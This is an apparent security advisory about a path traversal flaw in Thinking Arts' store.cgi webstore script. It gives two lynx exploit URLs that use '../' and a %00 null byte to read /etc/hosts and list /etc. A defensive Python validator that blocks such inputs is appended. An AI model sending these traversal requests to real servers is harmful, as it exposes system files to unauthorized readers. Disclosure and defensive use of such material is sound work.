Name: WebSPIRS CGI script "show files" Vulnerability.

About: Thinking Arts LTD's E-Commerce package comes with a webstore frontend called store.cgi, which lets people order products on their website from a SQL database.

Problem: Adding the string "/../" to a URL allows an attacker to view any file on the server, and also to list directories on the server.

Exploit:

lynx http://www.VULNERABLE.com/cgi-bin/store.cgi?StartID=../etc/hosts%00.html
lynx http://www.VULNERABLE.com/cgi-bin/store.cgi?StartID=../etc/%00.html

by: slipy (slipy@b10z.net)
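For comparison, here is how a defender would validate a StartID-style parameter so that neither "../" segments nor a %00 (NUL) byte can pull the lookup outside the page directory. This is an added example, not code from the advisory or from the vendor; the page directory, the function name and the ".html" suffix it appends are assumptions.

```python
import os
from urllib.parse import unquote

# Assumed page directory for the store's HTML fragments (constructed, not from the advisory).
PAGE_ROOT = os.path.realpath("/srv/store/pages")


def resolve_page(start_id_raw, root=PAGE_ROOT):
    """Map a raw StartID query value to a file under root, or return None if unsafe.

    Two failure modes are rejected: '..' segments that walk out of the page
    directory, and a NUL byte (%00) that would truncate the path before the
    '.html' suffix is appended when the string reaches a C-level open().
    """
    start_id = unquote(start_id_raw)          # %2e%2e, %2f, %00 become real characters
    if "\x00" in start_id:                    # NUL truncation attempt: refuse outright
        return None
    if not start_id or start_id.startswith("/"):
        return None                           # empty or absolute paths are never pages
    # Append the suffix first, then canonicalise so '..' and symlinks are collapsed
    candidate = os.path.realpath(os.path.join(root, start_id + ".html"))
    # Containment check: the canonical path must still be inside root
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for raw in ("catalog", "docs/../catalog", "../etc/hosts%00.html", "../../etc/passwd"):
        print(repr(raw), "->", resolve_page(raw))
```

A request that fails the check should be logged with the raw parameter value, since repeated "../" or "%00" probes are a clear signal of this class of attack.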